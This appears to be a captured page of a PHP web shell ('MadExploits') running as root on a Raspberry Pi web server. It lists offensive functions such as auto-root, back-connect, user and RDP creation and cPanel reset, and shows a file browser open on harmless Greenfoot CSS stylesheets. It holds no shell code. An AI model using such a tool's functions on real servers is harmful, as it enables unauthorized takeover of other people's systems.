Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
greenfoot /
stylesheets /
[ HOME SHELL ]
Name
Size
Permission
Action
debugger.css
1.28
KB
-rw-r--r--
dialogs.css
12.03
KB
-rw-r--r--
editor-banners.css
461
B
-rw-r--r--
editor-catalogue.css
1.97
KB
-rw-r--r--
editor-error-bar.css
682
B
-rw-r--r--
editor-error-fix.css
825
B
-rw-r--r--
editor-expression.css
1.5
KB
-rw-r--r--
editor-help.css
742
B
-rw-r--r--
editor-menu.css
76
B
-rw-r--r--
editor-selection.css
300
B
-rw-r--r--
editor-slot-choice.css
441
B
-rw-r--r--
editor-suggestions.css
2.72
KB
-rw-r--r--
editor-tabs.css
724
B
-rw-r--r--
frame-style.css
27.4
KB
-rw-r--r--
greenfoot.css
4.82
KB
-rw-r--r--
inspectors.css
2.51
KB
-rw-r--r--
java-colors.css
1.38
KB
-rw-r--r--
moe.css
4.13
KB
-rw-r--r--
pkgmgrframe.css
7.37
KB
-rw-r--r--
popup.css
378
B
-rw-r--r--
shared.css
284
B
-rw-r--r--
terminal.css
739
B
-rw-r--r--
tests.css
1.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editor-suggestions.css
/* Styles for suggestions (i.e. code completion) */ .root { suggestion-background: white; } .suggestion-list { -fx-background-color: suggestion-background; -fx-padding: 2 0 0 0; -fx-border-color: hsb(0, 0%, 70%); -fx-border-width: 1; -fx-border-style: solid outside; -bj-pref-width: 25em; -bj-type-width: 5em; } .suggestion { -fx-padding: 0 2 0 0; -fx-cursor: hand; -fx-background-color: transparent; } .suggestion-cell { -fx-padding: 0; -fx-background-color: transparent; } .suggestion-prefix, .suggestion-matching, .suggestion-next, .suggestion-suffix { -fx-label-padding: 0 -2 0 0; } .suggestion-matching, .suggestion-type:bj-match { -fx-underline: true; } .suggestion-next { -fx-font-weight: bold; } .suggestion-button-hint { -fx-font-size: 75%; -fx-border-color: rgb(150, 150, 150); -fx-border-radius: 2; -fx-label-padding: 1; -fx-background-color: transparent; -fx-background-radius: 2; } .suggestion:bj-suggestion-highlight { -fx-background-color: hsb(180, 30%, 90%); } .suggestion-similar-heading { -fx-label-padding: 2 0 2 20; -fx-background-color: hsb(0, 0%, 95%); -fx-text-fill: hsb(0, 0%, 40%); /* To get some padding: */ -fx-border-color: transparent; -fx-border-width: 5 0 2 0; } /* Make the similar suggestions grey, to de-emphasise */ .suggestion:bj-suggestion-similar .label { -fx-text-fill: hsb(0, 0%, 50%); } .suggestion-none { -fx-label-padding: 10 20 10 20; -fx-text-fill: hsb(0, 0%, 40%); } .suggestion-javadoc, .suggestion-file-preview { -fx-background-color: hsb(180, 8%, 97%); -fx-background-radius: 0 5 5 0; -fx-border-color: hsb(0, 0%, 70%); -fx-border-width: 1; -fx-border-radius: 0 5 5 0; -fx-border-style: solid outside; } .suggestion-file-preview { -fx-padding: 20 20 20 20; } .suggestion-javadoc .web-view { -fx-font-smoothing-type: gray; -fx-content-menu-enabled: false; } /* Remove focus highlight on scroll bar */ .suggestion-list-scroll-pane:focused { -fx-background-color: -fx-box-border, -fx-box-border, -fx-background !important; } .suggestion-more-label { -fx-text-fill: hsb(0, 0%, 30%); -fx-background-color: transparent; -fx-font-style: italic; -fx-padding: 3; -fx-wrap-text: true; } .suggestion-more-label-pane { -fx-background-color: white; -fx-border-width: 1 0 1 0; -fx-border-color: hsb(0, 0%, 70%) transparent hsb(0, 0%, 70%) transparent; -fx-border-style: solid inside; } .suggestion-more-label-pane:bj-at-top { -fx-border-width: 1 0 1 0; -fx-border-color: hsb(0, 0%, 70%) transparent hsb(0, 0%, 70%) transparent; } .suggestion-top-level { -fx-padding: 1; /* Needed to get border of inner item to show */ }
Close